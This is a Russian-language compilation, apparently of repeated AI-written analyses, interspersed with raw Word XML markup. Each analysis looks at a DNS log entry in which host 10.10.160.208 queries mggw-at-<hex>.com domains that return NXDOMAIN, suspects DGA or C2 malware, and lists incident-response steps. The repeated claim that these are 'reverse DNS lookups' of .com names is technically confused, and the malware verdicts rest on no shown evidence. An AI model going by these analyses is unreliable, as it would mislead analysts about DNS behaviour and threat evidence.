скомпрометированы.</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mggw-at-36ef628b2e277cc20160d9b7db52b2b7.com</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журнала, отражает событие запроса DNS. Ниже приведена подробная разбивка и анализ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Скорее всего, это внутренний идентификатор или порядковый номер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событие связано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то,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IP-адрес устройства в вашей внутренней сети, отправившего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либо исходный порт, либо идентификатор транзакции DNS, связанный с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 связанный с этим конкретным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Это может быть флаг DNS, связанный с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Прямым ответом</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или чем-то подобным.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указывает на то,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который используется для обратного поиска DNS с целью преобразования IP-адреса в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доменное имя, которое система попыталась разрешить через обратный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10.10.160.208попыталось выполнить обратный поиск DNS, что привело к ответу NXDOMAIN. Это означает, что запрошенный домен ( mggw-at-36ef628b2e277cc20160d9b7db52b2b7.com)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 mggw-at-36ef628b2e277cc20160d9b7db52b2b7.comпо-видимому, генерируется случайным образом, возможно, с помощью алгоритма генерации домена (DGA). DGA часто используются вредоносными программами для создания динамических доменных имен для подключения к серверам управления и контроля (C2), что затрудняет блокировку вредоносных коммуникаций.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Тот факт, что устройство в вашей сети пытается разрешить такой домен, предполагает потенциальную вредоносную активность. Это может быть признаком заражения вредоносным ПО или неправильной конфигурации приложения.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устройство : определите, какое устройство соответствует этому IP-адресу, и проведите расследование на предмет необычной активности или признаков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Сканирование на наличие вредоносного ПО : запустите комплексное сканирование устройства на наличие вредоносного ПО, чтобы обнаружить любые заражения, особенно те, которые могут генерировать DNS-запросы к подозрительным или несуществующим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журналов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шаблонов : Проверьте журналы DNS на наличие похожих запросов, особенно тех, которые приводят к NXDOMAINответам с похожими структурами доменных имен. Многочисленные случаи могут указывать на более масштабную проблему, например, на заражение всей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журналами : сравните этот журнал с другими журналами безопасности (например, брандмауэра, прокси-сервера), чтобы увидеть, есть ли какие-либо коррелированные действия, которые могут указывать на утечку данных или горизонтальное перемещение внутри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Исходящий трафик : отслеживайте любой необычный исходящий трафик с этого устройства, особенно попытки подключения к другим подозрительным доменам или IP-адресам.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изолируйте : если подтверждено или есть веские основания полагать, что устройство взломано, рассмотрите возможность его изоляции от сети, чтобы предотвратить потенциальное распространение или потерю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просмотрите все оповещения и предупреждения от инструментов безопасности конечных точек, которые могут предоставить дополнительный контекст или указать на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Эскалация в службу реагирования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Расследование инцидента : если устройство демонстрирует признаки взлома, сообщите о проблеме своей группе реагирования на инциденты для локализации и устранения последствий.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Профилактические меры : на основании полученных результатов рассмотрите возможность обновления политик безопасности, таких как правила фильтрации DNS, чтобы предотвратить возникновение подобных ситуаций в будущем.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попыталось 10.10.160.208разрешить домен, который не существует и имеет характеристики, типичные для доменов, созданных DGA, используемых во вредоносном ПО. Такое поведение требует немедленного расследования, чтобы убедиться, что устройство не скомпрометировано, и предотвратить любое потенциальное распространение вредоносной активности в вашей сети.</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mggw-at-3833a2456f07be6cc414c99060cbf0f2.com</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отражает событие запроса DNS, в частности, обратный поиск DNS, и содержит элементы, похожие на предыдущие записи, которые вы предоставили. Ниже приведен подробный анализ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внутренний идентификатор или порядковый номер этой записи журнала в системе регистрации.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Прямой ответ</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или флаг, связанный с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и интерпретация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10.10.160.208предприняло попытку обратного поиска DNS, в результате чего был получен NXDOMAINответ, означающий, что запрошенный домен ( mggw-at-3833a2456f07be6cc414c99060cbf0f2.com)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что типично для доменов, созданных с помощью алгоритмов генерации доменов (DGA). DGA обычно используются вредоносными программами для создания динамических доменных имен для коммуникаций Command and Control (C2), что затрудняет блокировку этих соединений защитникам.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10.10.160.208пытается разрешить домен, который, вероятно, связан с вредоносной активностью, что позволяет предположить, что устройство может быть взломано или что приложение на нем ведет себя подозрительно.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устройство : определите, какое устройство соответствует этому IP-адресу, и расследуйте любое недавнее необычное поведение или признаки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Проведите сканирование на наличие вредоносного ПО : запустите комплексное сканирование устройства на наличие вредоносного ПО, чтобы обнаружить любые заражения, особенно те, которые могут генерировать DNS-запросы к подозрительным или несуществующим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журналов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шаблонов : Поиск журналов DNS на предмет других запросов, которые привели к NXDOMAINответам на домены с похожей структурой. Это может указывать на более широкое заражение или неправильную конфигурацию.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трафик DNS : проверьте другие запросы DNS, сделанные этим устройством, чтобы выявить любые другие подозрительные действия, такие как запросы к известным вредоносным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исходящего трафика : отслеживайте исходящий сетевой трафик устройства, чтобы проверить наличие подключений к подозрительным IP-адресам или доменам. Это может помочь выявить потенциальную утечку данных или связь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устройство демонстрирует явные признаки взлома, рассмотрите возможность его изоляции от сети, чтобы предотвратить дальнейший ущерб или кражу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оповещения безопасности : просмотрите любые оповещения или подозрительные действия, зарегистрированные решениями безопасности конечных точек на этом устройстве. Это может предоставить дополнительный контекст или подтвердить подозрения о наличии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подтверждено, что устройство взломано, передайте информацию об инциденте своей группе реагирования на инциденты для локализации, ликвидации и восстановления.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проверьте, является ли это событие частью более широкой атаки, сопоставив его с другими оповещениями или инцидентами безопасности, особенно с теми, которые связаны с похожими DNS-запросами или действиями, связанными с DGA.</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домен, который, вероятно, сгенерирован алгоритмом генерации домена (DGA), часто связанным с вредоносным ПО. Ответ NXDOMAIN указывает на то, что домен не существует, что типично для сценариев, когда вредоносное ПО пытается связаться со своим сервером C2. Такое поведение следует немедленно расследовать, чтобы убедиться, что устройство не скомпрометировано, и смягчить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mggw-at-f3f0c6e992b7562598d9865b6fe8b3a6.com</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соответствует предыдущим, и следует той же схеме. Вот подробный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внутренний идентификатор для данной конкретной записи журнала в системе регистрации.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 связанный с этим конкретным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DNS, возможно,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Прямой ответ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">».</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10.10.160.208попыталось выполнить обратный поиск DNS, что привело к NXDOMAINответу. Это означает, что домен ( mggw-at-f3f0c6e992b7562598d9865b6fe8b3a6.com)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который обычно используется вредоносным ПО для динамической генерации доменных имен для коммуникаций командования и управления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Внутренняя активность устройства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Тот факт, что устройство в вашей сети пытается разрешить такой домен, предполагает возможное заражение вредоносным ПО или неправильную конфигурацию. Это устройство может пытаться подключиться к серверу C2 или заниматься другими вредоносными действиями.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устройство : определите, какое устройство соответствует IP-адресу,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Проведите сканирование на наличие вредоносного ПО : выполните полное сканирование устройства на наличие вредоносного ПО, чтобы выявить любые инфекции, которые могут вызывать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журналов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в журналах DNS других запросов, которые привели к NXDOMAINответам с похожими шаблонами домена. Несколько таких записей могут указывать на более широкую проблему.</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активность DNS : проверьте DNS-запросы устройства на наличие других подозрительных шаблонов, в частности запросов к известным вредоносным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исходящего трафика : отслеживайте сетевой трафик с этого устройства на предмет любых подключений к подозрительным или неизвестным IP-адресам. Это может помочь определить, пытается ли устройство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подтверждается, что устройство взломано или продолжает демонстрировать подозрительное поведение, рассмотрите возможность его изоляции от сети, чтобы предотвратить дальнейший потенциальный ущерб.</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просмотрите все оповещения или журналы инструментов безопасности конечных точек, связанные с этим устройством. Они могут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вы подтвердите, что устройство взломано, передайте проблему своей группе реагирования на инциденты для локализации, ликвидации и восстановления.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выясните, связано ли это событие с другими инцидентами безопасности, такими как дополнительные DNS-запросы с других устройств или подозрительное поведение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еще один случай, когда устройство в вашей сети пытается разрешить доменное имя, которое не существует и, вероятно, сгенерировано алгоритмом генерации домена (DGA). Такое поведение настоятельно предполагает потенциальную вредоносную активность, которую следует немедленно расследовать, чтобы убедиться, что устройство не скомпрометировано, и предотвратить дальнейшее распространение вредоносной активности в вашей сети.</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похожа на предыдущие,Она представляет собой другое событие запроса DNS, а именно обратный поиск DNS, и содержит индикаторы, которые могут быть связаны с потенциально вредоносной активностью. Вот подробная разбивка и анализ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это внутренний идентификатор или порядковый номер для этой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что привело к NXDOMAINответу. Это означает, что запрошенный домен ( mggw-at-0d597695fbacb291dd5ad6400c808b3c.com)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обычно используются вредоносными программами для создания динамических доменных имен для подключения к серверам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Тот факт, что устройство в вашей сети пытается разрешить такой домен, предполагает потенциальную вредоносную активность, возможно, указывающую на то, что устройство скомпрометировано и пытается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связано с этим IP-адресом,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проведите полное сканирование устройства на наличие вредоносного ПО, чтобы обнаружить любые инфекции, которые могут генерировать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шаблонов : проанализируйте журналы DNS, чтобы определить, есть ли похожие запросы, которые привели к NXDOMAINответам, особенно с похожими структурами доменных имен. Это может указывать на более широкую проблему, затрагивающую несколько устройств.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DNS-запросы : проверьте, делало ли устройство другие DNS-запросы к аналогичным подозрительным доменам, которые могут указывать на продолжающиеся попытки установления связи с инфраструктурой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Мониторинг сетевого трафика с этого устройства на предмет любых подключений к подозрительным или неизвестным IP-адресам. Это может помочь обнаружить потенциальную связь C2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рассмотрите возможность его изоляции от сети, чтобы предотвратить дальнейшее распространение или повреждение.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Посмотрите на оповещения : проверьте журналы безопасности конечной точки на наличие оповещений или аномалий, связанных с этим устройством. Это может предоставить дополнительные доказательства вредоносной активности или присутствия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компрометация подтверждена, передайте проблему своей группе реагирования на инциденты для принятия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Проанализируйте более широкие последствия : выясните, является ли это событие частью более крупной атаки или в сети есть другие скомпрометированные устройства.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доменное имя, вероятно, сгенерированное алгоритмом генерации домена (DGA), часто связанным с вредоносным ПО. Ответ NXDOMAIN указывает на то, что домен не существует, что может быть частью попыток вредоносного ПО подключиться к серверу C2. Такое поведение требует немедленного расследования, чтобы подтвердить, скомпрометировано ли устройство, и предпринять соответствующие действия для сдерживания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согласуется с предыдущими и представляет собой еще одно событие запроса DNS, включающее обратный поиск DNS. Давайте разберем его и проанализируем подробно:</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идентификатор или порядковый номер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 связанный с этим запросом.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что привело к NXDOMAINответу. Это означает, что запрошенный домен ( mggw-at-4780918bd4bdb423eff6618b7df90e71.com)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обычно используются вредоносными программами для создания динамических доменных имен для подключений к серверам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Повторное появление этих запросов позволяет предположить, что устройство может быть взломано или заражено вредоносным ПО, которое пытается взаимодействовать с инфраструктурой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устройство, связанное с этим IP-адресом,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проведите полное сканирование устройства на наличие вредоносного ПО, чтобы выявить любые инфекции, которые могут генерировать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шаблонов : Ищите похожие DNS-запросы, которые привели к NXDOMAINответам, особенно те, которые включают в себя похожие структурированные доменные имена. Несколько таких запросов могут указывать на более широкую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DNS-запросы : проверьте другие DNS-запросы, сделанные этим устройством, чтобы оценить, пытается ли оно подключиться к другим подозрительным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Мониторинг сетевого трафика с этого устройства для выявления любых подключений к подозрительным IP-адресам или доменам. Это может помочь определить, пытается ли устройство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рассмотрите возможность его изоляции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оповещения : ищите любые оповещения или аномалии, зарегистрированные инструментами безопасности конечных точек, связанными с этим устройством. Это может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компрометация подтверждена, передайте информацию своей группе реагирования на инциденты для принятия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Проанализируйте более широкие последствия : выясните, является ли этот инцидент частью более крупной атаки, включая проверку аналогичной активности на других устройствах в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является еще одним указанием на то, что устройство 10.10.160.208пытается разрешить доменное имя, вероятно, сгенерированное алгоритмом генерации домена (DGA), поведение, которое обычно связывают с вредоносным ПО. Ответ NXDOMAIN предполагает, что домен не существует, что может быть частью попытки связи с C2. Необходимо немедленное расследование и реагирование, чтобы определить, скомпрометировано ли устройство, и смягчить любые потенциальные угрозы в вашей сети.</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в журнале, как и предыдущие, указывает на событие запроса DNS, включающее обратный поиск DNS. Давайте разберем его и проанализируем его последствия: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или порядковый номер для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что привело к NXDOMAINответу. Это означает, что запрошенный домен ( mggw-at-36ef628b2e277cc20160d9b7db52b2b7.com)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часто используются вредоносными программами для генерации доменных имен для связи с серверами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Повторное появление таких запросов позволяет предположить, что устройство может быть заражено вредоносным ПО, которое пытается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проверьте его на наличие признаков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комплексное сканирование устройства на наличие вредоносного ПО, чтобы обнаружить любые инфекции, которые могут вызывать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Проверьте журналы DNS на наличие других запросов, которые привели к NXDOMAINответам с похожими шаблонами доменов. Шаблон таких запросов может указывать на более широкую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проверьте трафик DNS устройства на наличие дополнительных подозрительных доменов, которые могут дополнительно подтвердить, что устройство пытается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Мониторинг сетевого трафика с этого устройства для обнаружения любых подключений к подозрительным IP-адресам или доменам. Это может помочь определить, участвует ли устройство в несанкционированной коммуникации.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обнаружены доказательства взлома, рассмотрите возможность изоляции устройства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оповещения : ищите любые оповещения или аномалии, зарегистрированные средствами безопасности конечных точек, которые связаны с этим устройством. Это может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подтверждено, что устройство взломано, передайте проблему своей группе реагирования на инциденты для локализации, ликвидации и восстановления.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выясните, является ли этот инцидент частью более крупной атаки, включая проверку аналогичной активности на других устройствах в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доменное имя, вероятно, сгенерированное алгоритмом генерации домена (DGA), который обычно ассоциируется с вредоносным ПО. Ответ NXDOMAIN указывает на то, что домен не существует, возможно, как часть попытки вредоносного ПО связаться с сервером управления и контроля (C2). Необходимо немедленное расследование, чтобы определить, скомпрометировано ли устройство, и смягчить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еще один случай события запроса DNS, включающего обратный поиск DNS, аналогичный предыдущим записям, которыми вы поделились. Вот подробная разбивка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или порядковый номер для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который используется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что привело к NXDOMAINответу. Это означает, что запрошенный домен ( mggw-at-3833a2456f07be6cc414c99060cbf0f2.com)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возможно, с помощью алгоритма генерации доменов (DGA). DGA часто используются вредоносными программами для создания доменных имен для связи с серверами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Повторение похожих записей в журнале позволяет предположить, что устройство может быть заражено вредоносным ПО, пытающимся взаимодействовать с сервером C2 путем генерации и запроса этих доменов.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устройство, связанное с этим IP-адресом,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полное сканирование устройства на наличие вредоносного ПО, чтобы обнаружить любые инфекции, которые могут вызывать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проанализируйте журналы DNS на предмет других запросов, которые привели к NXDOMAINответам, особенно с похожими структурированными доменными именами. Шаблон может указывать на более широкую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просмотрите трафик DNS на предмет дополнительных подозрительных запросов или соединений, которые могут предоставить дополнительные доказательства попытки связи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Контролируйте сетевой трафик с этого устройства, чтобы определить любые соединения с подозрительными или неизвестными IP-адресами. Это может помочь в обнаружении несанкционированных попыток связи.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есть доказательства взлома, рассмотрите возможность изоляции устройства от сети, чтобы предотвратить дальнейший потенциальный вред.</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Это может дать дополнительную информацию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 если подтверждено, что устройство взломано, передайте проблему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Сопоставьте с другими инцидентами : выясните, является ли это событие частью более крупной атаки, в том числе проверив другие устройства в сети на предмет аналогичной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другое доменное имя, вероятно, сгенерированное алгоритмом генерации домена (DGA), который часто ассоциируется с вредоносным ПО. Ответ NXDOMAINуказывает на то, что домен не существует, возможно, как часть попытки вредоносного ПО связаться с сервером управления и контроля (C2). Необходимо немедленное расследование, чтобы подтвердить, скомпрометировано ли устройство, и предпринять шаги для смягчения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представляет собой DNS-запрос для обратного поиска DNS и включает индикаторы, которые могут указывать на подозрительную активность. Давайте подробно разберем запись журнала и проанализируем ее.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внутренний идентификатор или порядковый номер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связана с сетевым пакетом, в частности с пакетом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что привело к NXDOMAINответу. Это означает, что запрошенный домен ( mggw-at-f3f0c6e992b7562598d9865b6fe8b3a6.com)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обычно используются вредоносными программами для создания динамических доменных имен для серверов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Повторные запросы к таким случайно сгенерированным доменам предполагают вероятность того, что устройство может быть заражено вредоносным ПО, пытающимся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связано с этим IP-адресом,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комплексное сканирование устройства на наличие вредоносного ПО, чтобы обнаружить любые инфекции, вызывающие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Проверьте журналы DNS на наличие других запросов, которые привели к NXDOMAINответам, особенно с похожими доменными структурами. Это может указывать на более широкий спектр вредоносной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Анализируйте трафик DNS : ищите закономерности в запросах DNS, которые могут помочь подтвердить, является ли устройство частью более крупной кампании или запрашиваются ли похожие домены.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Проверьте сетевой трафик с этого устройства на наличие подключений к подозрительным или неизвестным IP-адресам. Это может помочь выявить попытки связаться с сервером C2 или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вы подтверждаете, что устройство взломано, рассмотрите возможность его изоляции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оповещения : Ищите оповещения или аномалии в журналах безопасности конечных точек, связанных с этим устройством. Это может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компрометация подтверждена, передайте проблему своей группе реагирования на инциденты для принятия мер по локализации, искоренению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проверьте, является ли эта активность частью более крупной атаки или другие устройства в сети демонстрируют аналогичные признаки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доменное имя, сгенерированное алгоритмом генерации домена (DGA), который обычно ассоциируется с вредоносным ПО. Ответ NXDOMAINуказывает на то, что домен не существует, возможно, как часть попытки вредоносного ПО связаться с сервером управления и контроля (C2). Требуется немедленное расследование, чтобы определить, скомпрометировано ли устройство, и предпринять необходимые действия для смягчения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журнала, представляет собой событие запроса DNS, включающее обратный поиск DNS. Вот подробная разбивка и анализ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для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DNS-поиск для домена mggw-at-0d597695fbacb291dd5ad6400c808b3c.com, что привело к NXDOMAINответу. Это означает, что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 использованием алгоритма генерации доменов (DGA). DGA часто используются вредоносными программами для создания доменных имен, которые часто меняются, что затрудняет блокировку или отслеживание коммуникаций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Повторные запросы к таким доменам позволяют предположить, что устройство может быть заражено вредоносным ПО, пытающимся связаться с сервером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тщательное сканирование устройства на наличие вредоносного ПО, чтобы выявить любые инфекции, которые могут быть ответственны за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шаблонами доменов. Выявление шаблона может указывать на продолжающуюся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проверьте наличие других DNS-запросов, выполняемых этим устройством, чтобы лучше понять его поведение и убедиться, что оно пытается подключиться к известным вредоносным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Мониторинг сетевого трафика с этого устройства для обнаружения любых подключений к подозрительным IP-адресам или доменам. Это может помочь выявить любые текущие попытки связаться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проверьте журналы безопасности конечной точки на наличие оповещений или аномалий, связанных с этим устройством. Это может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наличие аналогичной активности на других устройствах в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предполагает, что устройство 10.10.160.208пытается разрешить доменное имя, вероятно, сгенерированное с помощью алгоритма генерации домена (DGA), техники, часто используемой вредоносным ПО. Ответ NXDOMAINуказывает на то, что домен не существует, возможно, как часть попытки вредоносного ПО связаться с сервером управления и контроля (C2). Необходимо немедленное расследование и реагирование, чтобы определить, скомпрометировано ли устройство, и смягчить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как и другие, включает в себя запрос DNS, связанный с обратным поиском DNS. Вот подробная разбивка и анализ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или порядковый номер для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для отслеживания данного конкретного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DNS-поиск для домена mggw-at-4780918bd4bdb423eff6618b7df90e71.com, что привело к NXDOMAINответу. Это означает, что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часто используются вредоносными программами для динамической генерации доменных имен для связи Command and Control (C2), что затрудняет блокировку или отслеживание.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Характер запросов к таким доменам позволяет предположить, что устройство может быть заражено вредоносным ПО, пытающимся связаться с сервером C2, используя эти динамически генерируемые домены.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проверьте его на наличие признаков взлома или необычной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тщательное сканирование устройства на наличие вредоносного ПО, чтобы обнаружить любые заражения, ответственные за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шаблонами. Это может помочь определить, есть ли шаблон вредоносной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проверьте журналы DNS на наличие дополнительных подозрительных запросов или подключений, выполненных этим устройством, которые могут подтверждать попытки взаимодействия с серверами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Контролируйте сетевой трафик с этого устройства, чтобы обнаружить подключения к подозрительным IP-адресам или доменам. Это может помочь выявить любые текущие попытки подключения к серверам C2 или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рассмотрите возможность его изоляции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Это может предоставить дополнительный контекст или подтвердить наличие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наличие аналогичной активности на других устройствах в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указывает на то, что устройство 10.10.160.208пытается разрешить доменное имя, сгенерированное алгоритмом генерации домена (DGA). Ответ NXDOMAINпредполагает, что домен не существует, возможно, как часть попытки вредоносной программы связаться с сервером управления и контроля (C2). Необходимо немедленное расследование, чтобы определить, скомпрометировано ли устройство, и предпринять соответствующие действия для смягчения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mggw-at-36ef628b2e277cc20160d9b7db52b2b7.com</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в журнале указывает на DNS-запрос, связанный с обратным DNS-поиском. Давайте разберем его и проанализируем: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для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этого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DNS-поиск для домена mggw-at-36ef628b2e277cc20160d9b7db52b2b7.com, но результат был NXDOMAIN. Это означает, что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используются вредоносными программами для создания доменных имен, которые часто трудно отследить и заблокировать, поскольку они часто меняются.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Частые запросы к таким динамически генерируемым доменам могут указывать на то, что устройство может быть заражено вредоносным ПО, пытающимся установить связь с сервером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проведите тщательную проверку на предмет любых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комплексное сканирование устройства на наличие вредоносного ПО, чтобы обнаружить и устранить любые заражения, вызывающие подозрительные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Проверьте журналы DNS на наличие других запросов с этого устройства, которые привели к NXDOMAINответам, особенно с похожими шаблонами. Выявление шаблона может выявить продолжающуюся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оцените трафик DNS, чтобы определить, есть ли другие необычные или подозрительные запросы, которые могут указывать на более широкое вредоносное поведение.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Контролируйте сетевой трафик с этого устройства, чтобы обнаружить соединения с подозрительными IP-адресами или доменами. Это может помочь в выявлении попыток связаться с серверами C2 или других вредоносных действий.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подтверждается,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Это может предоставить дополнительный контекст или подтверждение присутствия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определите, является ли эта активность частью более крупной атаки, и проверьте другие устройства в сети на предмет аналогичного подозрительного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журнала указывает на то, что устройство 10.10.160.208пытается разрешить доменное имя, сгенерированное алгоритмом генерации домена (DGA). Ответ NXDOMAINпредполагает, что домен не существует, возможно, как часть попытки вредоносного ПО связаться с сервером управления и контроля (C2). Необходимо немедленное расследование и реагирование, чтобы подтвердить, скомпрометировано ли устройство, и смягчить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указывает на то, что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этого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может быть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указывает на то,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10.10.160.208выполнило обратный поиск DNS для домена mggw-at-3833a2456f07be6cc414c99060cbf0f2.com, и результатом было NXDOMAIN. Это означает, что запрошенный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обычно используются вредоносными программами для создания доменов, которые часто меняются, что затрудняет блокировку или отслеживание вредоносной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Повторные запросы к таким доменам позволяют предположить, что устройство может быть скомпрометировано вредоносным ПО, которое пытается связаться с сервером управления и контроля (C2), используя динамически генерируемые домены.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Определить и проверить : определить, какое устройство соответствует этому IP-адресу. Проверить устройство на наличие признаков компрометации, необычного поведения или заражения вредоносным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тщательное сканирование на наличие вредоносного ПО, чтобы обнаружить и устранить любые заражения, ответственные за создание этих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Выявление шаблонов может помочь определить масштаб проблемы.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на наличие других подозрительных запросов или шаблонов, которые могут указывать на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мониторинг сетевого трафика с устройства для обнаружения любых подключений к подозрительным IP-адресам или доменам. Это может помочь выявить попытки связаться с серверами C2 или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Это может предоставить дополнительный контекст или подтверждение наличия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другие устройства в сети на предмет аналогичного подозрительного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Эта запись в журнале указывает на то, что устройство 10.10.160.208пытается разрешить доменное имя, сгенерированное алгоритмом генерации домена (DGA). Ответ NXDOMAINпредполагает, что домен не существует, возможно, как часть попытки вредоносной программы связаться с сервером управления и контроля (C2). Необходимо немедленное расследование, чтобы подтвердить, скомпрометировано ли устройство, и принять соответствующие меры для устранения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DNS-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">запрос, связанный с обратным DNS-поиском. Давайте разберем его, чтобы понять его последствия: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для отслеживания этого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поиск DNS для домена mggw-at-f3f0c6e992b7562598d9865b6fe8b3a6.com, и результатом было NXDOMAIN. Это означает, что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сгенерировано случайным образом, вероятно, с помощью алгоритма генерации доменов (DGA). DGA обычно используются вредоносными программами для генерации доменных имен, которые трудно блокировать или отслеживать, поскольку они часто меняются.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Запрос таких динамически генерируемых доменов предполагает, что устройство может быть скомпрометировано вредоносным ПО, пытающимся связаться с сервером управления и контроля (C2). Это может быть частью попытки обнаружить или проверить наличие сервера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проверьте его на наличие признаков взлома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выполните тщательное сканирование устройства на наличие вредоносного ПО, чтобы обнаружить и устранить любые заражения, ответственные за генерацию этих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шаблонами. Это может помочь подтвердить, есть ли шаблон подозрительной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на наличие других запросов или шаблонов, которые могут указывать на вредоносное поведение или попытки взаимодействия с сервером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Inspect Outbound Traffic : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Контролируйте сетевой трафик с этого устройства, чтобы обнаружить любые соединения с подозрительными IP-адресами или доменами. Это может помочь выявить попытки связаться с серверами C2 или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подтверждается,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Это может предоставить дополнительный контекст или подтверждение присутствия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наличие аналогичной активности на других устройствах в сети.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10.10.160.208запрашивает домен, сгенерированный алгоритмом генерации доменов (DGA). Ответ NXDOMAINуказывает на то, что домен не существует, что может быть частью попытки вредоносной программы связаться с сервером управления и контроля (C2). Немедленное расследование и реагирование имеют решающее значение для подтверждения того, что устройство скомпрометировано, и для устранения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эта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используемая системой для отслеживания этого пакета или процесса.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который обычно используется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означает,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:mggw-at-0d597695fbacb291dd5ad6400c808b3c.com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Это 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10.10.160.208выполнило обратный DNS-поиск для домена mggw-at-0d597695fbacb291dd5ad6400c808b3c.com. Ответ NXDOMAINозначает, что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генерируется динамически, вероятно, с помощью алгоритма генерации доменов (DGA). DGA используются вредоносным ПО для генерации серии доменных имен, которые трудно отследить или заблокировать, часто используются для целей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Повторные запросы динамически генерируемых доменов указывают на то, что устройство может быть скомпрометировано вредоносным ПО, пытающимся связаться с сервером C2 или выполнить какую-либо другую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проведите детальную проверку на предмет наличия признаков взлома или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вредоносного ПО : проведите тщательное сканирование устройства на наличие вредоносного ПО, чтобы обнаружить и устранить любые заражения, которые могут быть ответственны за эти DNS-запросы.</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характеристиками. Это может помочь в выявлении шаблона подозрительной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на наличие других подозрительных запросов или шаблонов, которые могут указывать на продолжающуюся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отслеживание сетевого трафика с этого устройства для выявления подключений к подозрительным IP-адресам или доменам, которые могут указывать на попытки связаться с серверами C2 или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подтверждается,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ищите любые оповещения или аномалии в журналах безопасности конечной точки, связанных с этим устройством. Эти журналы могут предоставить дополнительный контекст или подтверждение наличия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передайте информацию вышестоящему органу : если будет подтверждено, что устройство взломано, передайте информацию о проблеме своей группе реагирования на инциденты для принятия соответствующих мер по локализации, ликвидации и восстановлению.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широкой атаки, и проверьте другие устройства в сети на предмет аналогичного подозрительного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10.10.160.208пытается разрешить доменное имя, которое, по-видимому, динамически генерируется алгоритмом генерации доменов (DGA). Ответ NXDOMAINуказывает, что запрошенный домен не существует, что может быть частью попытки вредоносной программы связаться с сервером управления и контроля (C2). Необходимо немедленное расследование, чтобы определить, скомпрометировано ли устройство, и устранить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журнал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на память для пакета.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указывать на флаг, связанный с DNS, или на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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Указывает,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:mggw-at-4780918bd4bdb423eff6618b7df90e71.com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 который был запрошен.</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10.10.160.208попыталось выполнить обратный DNS-поиск для домена mggw-at-4780918bd4bdb423eff6618b7df90e71.com. Ответ NXDOMAINуказывает, что этот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Доменное имя, по-видимому, динамически генерируется, возможно, с помощью алгоритма генерации доменов (DGA). DGA обычно используются вредоносными программами для генерации большого количества доменных имен, которые могут использоваться для обхода обнаружения и облегчения связи с серверами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Запрос таких динамически генерируемых доменов предполагает возможность того, что устройство скомпрометировано и пытается обнаружить или подключиться к серверу C2 или другой вредоносной инфраструктуре.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выполните проверку на наличие признаков вредоносного ПО или других проблем безопасности.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вредоносных программ : выполните комплексное сканирование устройства на наличие вредоносных программ для обнаружения и устранения любых заражений.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Ищите другие DNS-запросы с этого устройства, которые привели к NXDOMAINответам, особенно с похожими шаблонами. Это может помочь определить, есть ли еще случаи подозрительной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изучение трафика DNS для выявления других шаблонов или запросов, которые могут указывать на вредоносную активность.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отслеживание исходящего трафика с этого устройства для обнаружения любых подключений к подозрительным IP-адресам или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подтверждается, что устройство взломано, рассмотрите возможность его изоляции от сети, чтобы предотвратить дальнейший ущерб.</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найдите любые оповещения или необычные действия в журналах безопасности конечных точек, связанных с этим устройством, которые могут предоставить дополнительную информацию.</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сообщите об этом вышестоящему органу : если устройство окажется взломанным, сообщите о проблеме своей группе реагирования на инциденты для принятия соответствующих мер по сдерживанию и устранению последствий.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проверьте, является ли эта активность частью более крупной атаки, и оцените другие устройства в сети на предмет аналогичного подозрительного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журнала указывает на то, что устройство 10.10.160.208выполняет обратный DNS-поиск для доменного имени, сгенерированного алгоритмом генерации домена (DGA). Ответ NXDOMAINпоказывает, что домен не существует, что может быть частью попытки вредоносной программы связаться с сервером C2. Немедленное расследование и реагирование имеют решающее значение для подтверждения того, что устройство скомпрометировано, и для устранения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данной конкретной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запись журнала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используемая системой для отслеживания этого пакета.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указывает на то,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 с целью сопоставления IP-адреса с доменным именем.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:mggw-at-36ef628b2e277cc20160d9b7db52b2b7.com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10.10.160.208попыталось выполнить обратный DNS-поиск для домена mggw-at-36ef628b2e277cc20160d9b7db52b2b7.com. NXDOMAINОтвет указывает, что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Домен, по-видимому, генерируется динамически, вероятно, с помощью алгоритма генерации домена (DGA). DGA используются вредоносными программами для генерации доменных имен, которые трудно отследить или заблокировать, часто для связи Command and Control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Повторные запросы к динамически генерируемым доменам, подобные этому, указывают на то, что устройство может быть взломано и пытается связаться с сервером C2 или выполнить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исследуйте его на предмет признаков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вредоносных программ : проведите комплексное сканирование устройства на наличие вредоносных программ, чтобы обнаружить и устранить любые заражения.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шаблонами. Это может помочь определить, есть ли еще случаи подозрительной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на предмет выявления других подозрительных запросов или шаблонов, указывающих на потенциальную активность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мониторинг исходящего сетевого трафика с этого устройства для обнаружения подключений к подозрительным IP-адресам или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изолируйте его от сети, чтобы предотвратить дальнейший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найдите оповещения или аномалии в журналах безопасности конечных точек, связанных с этим устройством, которые могут предоставить дополнительную информацию о потенциальных вредоносных действиях.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ситуацию : если компрометация подтверждена, передайте проблему своей группе реагирования на инциденты для принятия соответствующих мер по сдерживанию и устранению последствий.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другие устройства в сети на предмет аналогичного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10.10.160.208запрашивает динамически сгенерированный домен с помощью алгоритма генерации домена (DGA). Ответ NXDOMAINуказывает, что этот домен не существует, что может быть частью попытки вредоносной программы связаться с сервером управления и контроля (C2). Немедленное расследование и реагирование имеют решающее значение для подтверждения того, скомпрометировано ли устройство, и для устранения любых потенциальных угроз.</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журнал относится к сетевому пакету, в частности к пакету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Ссылка, используемая системой для 